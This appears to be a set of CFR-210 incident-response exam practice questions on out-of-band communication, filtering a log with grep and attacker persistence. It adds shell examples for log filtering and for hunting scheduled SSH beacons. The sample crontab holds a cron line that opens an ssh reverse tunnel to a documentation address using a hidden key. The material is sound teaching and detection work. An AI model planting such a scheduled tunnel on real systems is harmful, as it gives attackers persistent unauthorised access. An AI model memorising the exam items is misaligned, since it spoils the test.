CFR-210 CyberSec First Responder

Showing 7–9 of 10 questions

Question 7

During an annual penetration test, several rootkit-enabled systems are found to be exfiltrating data. The penetration test team and the internal incident response team work together to begin cleanup. The company's operations team offers a new email server to use for communications during the incident. As cleanup continues, the attackers seem to know exactly what the incident response plan is. Which of the following will prevent the attackers from compromising cleanup activities?

  • Check the DNS server for rootkits placed by the attackers.

  • Disconnect the Internet router until all systems can be checked and cleaned.

  • Use out-of-band communication until the end of the incident.

  • Disconnect the old email server until it can be checked and cleaned.

Question 8

A DMZ web server has been compromised. During the log review, the incident responder wants to parse all common internal Class A addresses from the log. Which of the following commands should the responder use to accomplish this?

  • grep -x "(10.[0-9]+.[0-9]+.[0-9]+)" etc/rc.d/apache2/access.log | output.txt

  • grep -x "(192.168.[0.9]+[0-9])" bin/apache2/access.log | output.txt

  • grep -v "(10.[0-9]+.[0-9]+.[0-9]+)" /var/log/apache2/access.log > output.txt

  • grep -v "(192.168.[0.9]+[0-9]+)" /var/log/apache2/access.log > output.txt
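
A worked example of the filtering this question asks about, added here and not part of the CFR-210 question set. It extracts the requests from the private Class A range (10.0.0.0/8) out of an Apache access log, using a constructed five-line log rather than real traffic and a temporary file instead of /var/log/apache2/access.log. It also shows the two points the distractors turn on: grep -v inverts the match and therefore drops exactly the 10.x lines, and "| output.txt" is a pipe to a command named output.txt, not a redirection.

```sh
# Added example (not part of the CFR-210 question set): keep only the requests
# from the private Class A range 10.0.0.0/8 in an Apache access log.
# The log lines are constructed for this example, not captured traffic.
write_sample_log() {
    cat > "$1" <<'EOF'
10.1.2.3 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
100.64.0.7 - - [10/Oct/2023:13:55:37 +0000] "GET /admin HTTP/1.1" 403 199
110.5.6.7 - - [10/Oct/2023:13:55:38 +0000] "GET /login HTTP/1.1" 200 512
10.255.0.9 - - [10/Oct/2023:13:55:39 +0000] "POST /upload HTTP/1.1" 500 0
192.168.1.5 - - [10/Oct/2023:13:55:40 +0000] "GET /robots.txt HTTP/1.1" 200 68
EOF
}

# Lines whose client address (first field) is inside 10.0.0.0/8.
#   ^         anchor to the start of the line so 100.x and 110.x cannot match
#   \.        a literal dot; an unescaped . would also match 10x.x.x.x
#   {1,3}     one to three digits per octet (-E enables this ERE syntax)
#   trailing space: the address must end where the first field ends
class_a_lines() {
    grep -E '^10(\.[0-9]{1,3}){3} ' "$1"
}

# Number of requests that came from 10.0.0.0/8.
class_a_count() {
    class_a_lines "$1" | wc -l | tr -d ' '
}

# The same pattern with -v, which INVERTS the match: this counts the lines
# that are NOT from 10.0.0.0/8, the opposite of what the question asks for.
not_class_a_count() {
    grep -vE '^10(\.[0-9]{1,3}){3} ' "$1" | wc -l | tr -d ' '
}

# Demo: write the sample, filter it, and save the hits with > (a shell
# redirection). Writing "| output.txt" instead would try to execute a
# program called output.txt and save nothing.
LOG=$(mktemp)
OUT=$(mktemp)
write_sample_log "$LOG"
class_a_lines "$LOG" > "$OUT"
printf 'matched %s of %s lines:\n' "$(class_a_count "$LOG")" "$(wc -l < "$LOG" | tr -d ' ')"
cat "$OUT"
rm -f "$LOG" "$OUT"
```

On the constructed log the filter keeps 10.1.2.3 and 10.255.0.9 and rejects 100.64.0.7 and 110.5.6.7, which a pattern without the ^ anchor and the escaped dots would have let through.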

Question 9

A malicious attacker has compromised a database by implementing a Python-based script that will automatically establish an SSH connection daily between the hours of 2:00 am and 5:00 am. Which of the following is the MOST common motive for the attack vector that was used?

  • Pivoting

  • Persistence/maintaining access

  • Exfiltration

  • Lateral movement
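
An added example of hunting for the mechanism this question describes (a scheduled job that opens an SSH connection during a fixed off-hours window); it is not part of the CFR-210 question set. It assumes the script was scheduled with cron, which the question does not state, and scans crontab-format lines for entries whose hour field overlaps 02:00-05:00 and whose command runs ssh or python. The crontab entries are constructed for the example, and 203.0.113.10 is a documentation address, not a real host.

```sh
# Added example (not part of the CFR-210 question set): hunt for a scheduled
# SSH beacon of the kind the question describes. Assumes cron scheduling;
# the entries below are constructed, and 203.0.113.10 is a documentation address.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# m h dom mon dow command
0 7 * * * /usr/local/bin/backup.sh
30 3 * * * /usr/bin/python3 /tmp/.cache/sync.py
0 2-5 * * * ssh -N -R 2222:127.0.0.1:22 -i /var/tmp/.k svc@203.0.113.10
*/15 * * * * /usr/bin/python3 /opt/app/health.py
15 4 * * * /usr/bin/curl -s https://example.invalid/health
EOF
}

# Print cron entries whose hour field (2nd column) overlaps 02:00-05:00 and
# whose command runs ssh or python. Handles a plain hour, an a-b range, comma
# lists and a /step suffix; "*" (every hour) is skipped because it is not
# specific to the off-hours window.
offhours_ssh_jobs() {
    awk '
    /^[[:space:]]*#/ || NF < 6 { next }
    {
        hit = 0
        n = split($2, parts, ",")
        for (i = 1; i <= n; i++) {
            p = parts[i]
            sub(/\/.*/, "", p)                 # 2-5/1 -> 2-5
            if (p == "*") continue
            lo = p; hi = p
            if (index(p, "-")) { split(p, r, "-"); lo = r[1]; hi = r[2] }
            if (lo + 0 <= 5 && hi + 0 >= 2) hit = 1
        }
        if (!hit) next
        cmd = ""
        for (i = 6; i <= NF; i++) cmd = cmd " " $i
        if (cmd ~ "(^|[ /])ssh( |$)" || cmd ~ "python") print
    }' "$1"
}

# Number of flagged entries, for quick triage of many crontabs.
offhours_ssh_count() {
    offhours_ssh_jobs "$1" | wc -l | tr -d ' '
}

# Demo run against the constructed crontab.
CRON=$(mktemp)
write_sample_crontab "$CRON"
offhours_ssh_jobs "$CRON"
rm -f "$CRON"
```

On the constructed crontab two entries are flagged: the Python script at 03:30 and the ssh reverse tunnel scheduled for every hour from 2 to 5. The 04:15 curl job falls in the window but runs neither ssh nor python, and the every-15-minutes Python health check is skipped because its hour field is "*". In a real engagement the same check would be run over /etc/crontab, /etc/cron.d/*, each user's crontab (crontab -l -u user) and the equivalent systemd timers, since a job that re-establishes access on a schedule is the persistence the question points at.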